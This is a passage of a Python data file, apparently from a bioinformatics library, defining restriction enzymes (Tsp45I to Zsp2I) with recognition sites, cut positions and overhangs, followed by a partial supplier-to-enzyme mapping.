return {
'charac': (0, 0, None, None, 'GTSAC'),
'compsite': '(?=(?P<Tsp45I>GT[CG]AC))',
'dna': None,
'freq': 512.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GTSAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTSAC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['Tsp45I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'ACNGT'),
'compsite': '(?=(?P<Tsp4CI>AC.GT))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACNGT',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Tsp4CI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GRACGAC'),
'compsite': '(?=(?P<TspARh3I>G[AG]ACGAC))|(?=(?P<TspARh3I_as>GTCGT[CT]C))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRACGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['TspARh3I'] = _temp()
def _temp():
return {
'charac': (16, 9, None, None, 'ATGAA'),
'compsite': '(?=(?P<TspDTI>ATGAA))|(?=(?P<TspDTI_as>TTCAT))',
'dna': None,
'freq': 1024.0,
'fst3': 9,
'fst5': 16,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATGAA',
'size': 5,
'substrat': 'DNA',
'suppl': ('Q', 'X'),
}
rest_dict['TspDTI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'AATT'),
'compsite': '(?=(?P<TspEI>AATT))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AATT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AATT',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['TspEI'] = _temp()
def _temp():
return {
'charac': (16, 9, None, None, 'ACGGA'),
'compsite': '(?=(?P<TspGWI>ACGGA))|(?=(?P<TspGWI_as>TCCGT))',
'dna': None,
'freq': 1024.0,
'fst3': 9,
'fst5': 16,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGGA',
'size': 5,
'substrat': 'DNA',
'suppl': ('Q', 'X'),
}
rest_dict['TspGWI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCCGGG'),
'compsite': '(?=(?P<TspMI>CCCGGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCGGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['TspMI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CASTG'),
'compsite': '(?=(?P<TspRI>CA[CG]TG))',
'dna': None,
'freq': 512.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 10,
'ovhgseq': 'NNCASTGNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CASTG',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['TspRI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAGNNNCTC'),
'compsite': '(?=(?P<TssI>GAG...CTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGNNNCTC',
'size': 9,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['TssI'] = _temp()
def _temp():
return {
'charac': (-8, -25, 24, 7, 'CACNNNNNNTCC'),
'compsite': '(?=(?P<TstI>CAC......TCC))|(?=(?P<TstI_as>GGA......GTG))',
'dna': None,
'freq': 4096.0,
'fst3': -25,
'fst5': -8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 7,
'scd5': 24,
'site': 'CACNNNNNNTCC',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['TstI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCGAC'),
'compsite': '(?=(?P<TsuI>GCGAC))|(?=(?P<TsuI_as>GTCGC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGAC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['TsuI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GACNNNGTC'),
'compsite': '(?=(?P<Tth111I>GAC...GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNGTC',
'size': 9,
'substrat': 'DNA',
'suppl': ('I', 'K', 'N', 'Q', 'V', 'X'),
}
rest_dict['Tth111I'] = _temp()
def _temp():
return {
'charac': (17, 9, None, None, 'CAARCA'),
'compsite': '(?=(?P<Tth111II>CAA[AG]CA))|(?=(?P<Tth111II_as>TG[CT]TTG))',
'dna': None,
'freq': 2048.0,
'fst3': 9,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAARCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Tth111II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TCGTA'),
'compsite': '(?=(?P<UbaF11I>TCGTA))|(?=(?P<UbaF11I_as>TACGA))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCGTA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['UbaF11I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTACNNNGTC'),
'compsite': '(?=(?P<UbaF12I>CTAC...GTC))|(?=(?P<UbaF12I_as>GAC...GTAG))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTACNNNGTC',
'size': 10,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['UbaF12I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAGNNNNNNCTGG'),
'compsite': '(?=(?P<UbaF13I>GAG......CTGG))|(?=(?P<UbaF13I_as>CCAG......CTC))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGNNNNNNCTGG',
'size': 13,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['UbaF13I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCANNNNNTCG'),
'compsite': '(?=(?P<UbaF14I>CCA.....TCG))|(?=(?P<UbaF14I_as>CGA.....TGG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCANNNNNTCG',
'size': 11,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['UbaF14I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TACNNNNNRTGT'),
'compsite': '(?=(?P<UbaF9I>TAC.....[AG]TGT))|(?=(?P<UbaF9I_as>ACA[CT].....GTA))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TACNNNNNRTGT',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['UbaF9I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGAACG'),
'compsite': '(?=(?P<UbaPI>CGAACG))|(?=(?P<UbaPI_as>CGTTCG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGAACG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['UbaPI'] = _temp()
def _temp():
return {
'charac': (-7, -11, 11, 7, 'GAGCTC'),
'compsite': '(?=(?P<UcoMSI>GAGCTC))',
'dna': None,
'freq': 4096.0,
'fst3': -11,
'fst5': -7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'NN',
'results': None,
'scd3': 7,
'scd5': 11,
'site': 'GAGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['UcoMSI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GGNCC'),
'compsite': '(?=(?P<UnbI>GG.CC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GGNCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNCC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['UnbI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCKAAG'),
'compsite': '(?=(?P<Van9116I>CC[GT]AAG))|(?=(?P<Van9116I_as>CTT[AC]GG))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCKAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Van9116I'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CCANNNNNTGG'),
'compsite': '(?=(?P<Van91I>CCA.....TGG))',
'dna': None,
'freq': 4096.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCANNNNNTGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['Van91I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'RTAAAYG'),
'compsite': '(?=(?P<VchE4II>[AG]TAAA[CT]G))|(?=(?P<VchE4II_as>C[AG]TTTA[CT]))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'RTAAAYG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['VchE4II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GNCYTAG'),
'compsite': '(?=(?P<Vdi96II>G.C[CT]TAG))|(?=(?P<Vdi96II_as>CTA[AG]G.C))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GNCYTAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Vdi96II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTTAAG'),
'compsite': '(?=(?P<Vha464I>CTTAAG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TTAA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTTAAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['Vha464I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GTGCAC'),
'compsite': '(?=(?P<VneI>GTGCAC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTGCAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['VneI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GGWCC'),
'compsite': '(?=(?P<VpaK11AI>GG[AT]CC))',
'dna': None,
'freq': 512.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GGWCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGWCC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['VpaK11AI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGWCC'),
'compsite': '(?=(?P<VpaK11BI>GG[AT]CC))',
'dna': None,
'freq': 512.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGWCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['VpaK11BI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATTAAT'),
'compsite': '(?=(?P<VspI>ATTAAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATTAAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'I', 'R', 'V'),
}
rest_dict['VspI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CACRAYC'),
'compsite': '(?=(?P<Vtu19109I>CAC[AG]A[CT]C))|(?=(?P<Vtu19109I_as>G[AG]T[CT]GTG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACRAYC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Vtu19109I'] = _temp()
def _temp():
return {
'charac': (27, 19, None, None, 'CACRAG'),
'compsite': '(?=(?P<WviI>CAC[AG]AG))|(?=(?P<WviI_as>CT[CT]GTG))',
'dna': None,
'freq': 2048.0,
'fst3': 19,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACRAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['WviI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CCTNNNNNAGG'),
'compsite': '(?=(?P<XagI>CCT.....AGG))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTNNNNNAGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['XagI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RAATTY'),
'compsite': '(?=(?P<XapI>[AG]AATT[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AATT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RAATTY',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['XapI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCTAGA'),
'compsite': '(?=(?P<XbaI>TCTAGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCTAGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['XbaI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TACGAG'),
'compsite': '(?=(?P<Xca85IV>TACGAG))|(?=(?P<Xca85IV_as>CTCGTA))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TACGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Xca85IV'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'RCATGY'),
'compsite': '(?=(?P<XceI>[AG]CATG[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RCATGY',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['XceI'] = _temp()
def _temp():
return {
'charac': (8, -8, None, None, 'CCANNNNNNNNNTGG'),
'compsite': '(?=(?P<XcmI>CCA.........TGG))',
'dna': None,
'freq': 4096.0,
'fst3': -8,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCANNNNNNNNNTGG',
'size': 15,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['XcmI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTCGAG'),
'compsite': '(?=(?P<XhoI>CTCGAG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TCGA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTCGAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'),
}
rest_dict['XhoI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RGATCY'),
'compsite': '(?=(?P<XhoII>[AG]GATC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGATCY',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['XhoII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCCGGG'),
'compsite': '(?=(?P<XmaI>CCCGGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCGGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N', 'R', 'V'),
}
rest_dict['XmaI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGGCCG'),
'compsite': '(?=(?P<XmaIII>CGGCCG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGCCG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['XmaIII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCTAGG'),
'compsite': '(?=(?P<XmaJI>CCTAGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTAGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['XmaJI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GTMKAC'),
'compsite': '(?=(?P<XmiI>GT[AC][GT]AC))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'MK',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTMKAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['XmiI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GAANNNNTTC'),
'compsite': '(?=(?P<XmnI>GAA....TTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAANNNNTTC',
'size': 10,
'substrat': 'DNA',
'suppl': ('N', 'R'),
}
rest_dict['XmnI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTAG'),
'compsite': '(?=(?P<XspI>CTAG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTAG',
'size': 4,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['XspI'] = _temp()
def _temp():
return {
'charac': (11, 9, None, None, 'C'),
'compsite': '(?=(?P<YkrI>C))|(?=(?P<YkrI_as>G))',
'dna': None,
'freq': 4.0,
'fst3': 9,
'fst5': 11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'C',
'size': 1,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['YkrI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GACGTC'),
'compsite': '(?=(?P<ZraI>GACGTC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACGTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N', 'V'),
}
rest_dict['ZraI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGTACT'),
'compsite': '(?=(?P<ZrmI>AGTACT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGTACT',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['ZrmI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'ATGCAT'),
'compsite': '(?=(?P<Zsp2I>ATGCAT))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATGCAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Zsp2I'] = _temp()
suppliers = {}
def _temp():
return (
'Life Technologies',
['BshTI', 'MluI', 'HpaII', 'MreI', 'BclI', 'SacI', 'PauI', 'BglI', 'SalI', 'MspI', 'ScaI', 'Bsu15I', 'Mva1269I', 'Bsp68I', 'LweI', 'SmiI', 'PteI', 'Mph1103I', 'TscAI', 'NcoI', 'PsyI', 'BseJI', 'ClaI', 'MauBI', 'Eco24I', 'CseI', 'Eco47III', 'Eco91I', 'DraI', 'BseXI', 'BstXI', 'RruI', 'Esp3I', 'BseSI', 'Cfr9I', 'AarI', 'OliI', 'PvuI', 'BspOI', 'DpnI', 'Hin6I', 'LguI', 'Van91I', 'Bst1107I', 'Bme1390I', 'PacI', 'Psp5II', 'TaqI', 'Eco52I', 'GsuI', 'KpnI', 'SspDI', 'SsiI', 'RseI', 'MlsI', 'NdeI', 'HapII', 'Cfr13I', 'MboII', 'SdaI', 'BmsI', 'BglII', 'TasI', 'AjuI', 'AloI', 'FspBI', 'SchI', 'PfoI', 'Bpu10I', 'BshNI', 'SacII', 'Acc65I', 'BmeT110I', 'XapI', 'TaaI', 'PscI', 'Bsp1407I', 'NruI', 'MvaI', 'PasI', 'Hin1II', 'PaeI', 'Bsh1236I', 'MssI', 'CpoI', 'Eco130I', 'PspFI', 'TaiI', 'FspAI', 'BfmI', 'Eco47I', 'BoxI', 'RsaI', 'HincII', 'HpyF10VI', 'XbaI', 'Lsp1109I', 'AjiI', 'Bsp119I', 'MboI', 'AluI', 'SduI', 'SgsI', 'BseGI', 'Eco72I', 'BcnI', 'SgeI', 'EcoRII', 'Alw21I', 'XagI', 'Hpy8I', 'PsuI', 'SmaI', 'NheI', 'BplI', 'Ppu21I', 'SmoI', 'FaqI', 'AdeI', 'StuI', 'BcuI', 'BspTI', 'SpeI', 'SphI', 'BseLI', 'AasI', 'PvuII', 'EheI', 'BveI', 'FokI', 'Hin1I', 'Alw26I', 'Cfr10I', 'SgrDI', 'Eco31I', 'HinfI', 'Eam1105I', 'BsuRI', 'Eam1104I', 'Ecl136II', 'XmaJI', 'SfaAI', 'HphI', 'Psp1406I', 'Csp6I', 'EcoO109I', 'BseMII', 'HindIII', 'EcoRV', 'AatII', 'BfuI', 'EcoRI', 'XmiI', 'TauI', 'XhoI', 'Bsp143I', 'BspPI', 'MnlI', 'PfeI', 'CaiI', 'Bpu1102I', 'MunI', 'Tru1I', 'BspLI', 'Eco105I', 'NsbI', 'PstI', 'VspI', 'Alw44I', 'SfiI', 'BpiI', 'XceI', 'BseMI', 'HaeIII', 'Kpn2I', 'Cfr42I', 'SatI', 'AccI', 'SspI', 'Eco32I', 'KflI', 'BseDI', 'KspAI', 'Eco81I', 'BauI', 'AanI', 'ApaI', 'SaqAI', 'EcoT22I', 'Eco88I', 'Eco57I', 'Eco147I', 'PdmI', 'BalI', 'CsiI', 'AfaI', 'Bsp120I', 'NotI', 'MbiI', 'BamHI', 'BfoI', 'TatI', 'HpaI', 'HpyF3I', 'Pfl23II', 'Bsh1285I', 'HhaI', 'NmuCI', 'BseNI', 'PagI', 'PdiI'],
)
suppliers['B'] = _temp()
def _temp():
return (
'Minotech Biotechnology',
['SgrBI', 'BclI', 'BglI', 'SalI', 'PspPI', 'ScaI', 'SnaBI', 'BstEII', 'NcoI', 'BshFI', 'AsuII', 'BssAI', 'BseAI', 'TaqI', 'KpnI', 'BglII', 'NaeI', 'BseBI', 'NruI', 'RsaI', 'BsiSI', 'XbaI', 'MboI', 'AluI', 'SlaI', 'SseBI', 'SmaI', 'NheI', 'SstI', 'Sau3AI', 'SphI', 'PvuII', 'ApaLI', 'HinfI', 'MspCI', 'HindIII', 'EcoRV', 'EcoRI', 'BseCI', 'PstI', 'SfiI', 'SspI', 'CspAI', 'NotI', 'BamHI', 'HpaI', 'StyI'],
)
suppliers['C'] = _temp()
def _temp():
return (
'Agilent Technologies',
['DpnI'],
)
suppliers['E'] = _temp()
def _temp():
return (
'SibEnzyme Ltd.',
['AsuNHI', 'AgsI', 'MluI', 'CciI', 'BstHHI', 'HpaII', 'AhlI', 'KroI', 'PspN4I', 'BglI', 'SalI', 'PspEI', 'MspI', 'VneI', 'BstH2I', 'BisI', 'BmtI', 'PspXI', 'AsiGI', 'CciNI', 'Sfr274I', 'SmiI', 'Ksp22I', 'BstSFI', 'BssT1I', 'PciSI', 'Bsp19I', 'Bse1I', 'AspS9I', 'AbsI', 'FauNDI', 'LmnI', 'AclWI', 'DraI', 'Bst2UI', 'AluBI', 'PsrI', 'BstACI', 'BstXI', 'BstDEI', 'GluI', 'AcoI', 'XmaI', 'BstF5I', 'BstMBI', 'BstENI', 'BssECI', 'FalI', 'EgeI', 'Ama87I', 'BstDSI', 'BstV2I', 'AjnI', 'AspLEI', 'PalAI', 'Zsp2I', 'DseDI', 'BstAUI', 'Bpu14I', 'FaeI', 'TaqI', 'KpnI', 'BstSNI', 'AclI', 'MboII', 'BglII', 'PspPPI', 'SetI', 'AcsI', 'BstNSI', 'BseX3I', 'RsaNI', 'Bpu10I', 'Rsr2I', 'Acc65I', 'Bst2BI', 'NruI', 'Ple19I', 'TseFI', 'SspMI', 'PciI', 'MalI', 'Bse118I', 'BsuI', 'BsePI', 'BstMCI', 'Bme18I', 'RsaI', 'BssNAI', 'BstV1I', 'Bsp13I', 'Bst4CI', 'MabI', 'AsuHPI', 'BtrI', 'XbaI', 'ArsI', 'BstC8I', 'Psp124BI', 'GlaI', 'HgaI', 'BstX2I', 'AluI', 'ZraI', 'Bse21I', 'Sfr303I', 'BstSCI', 'Bse3DI', 'Bso31I', 'AccB7I', 'BstKTI', 'AccBSI', 'SmaI', 'SmiMI', 'BspACI', 'AspA2I', 'Bsp1720I', 'Bsc4I', 'SphI', 'Mly113I', 'FriOI', 'PvuII', 'MfeI', 'ErhI', 'FokI', 'AsuC2I', 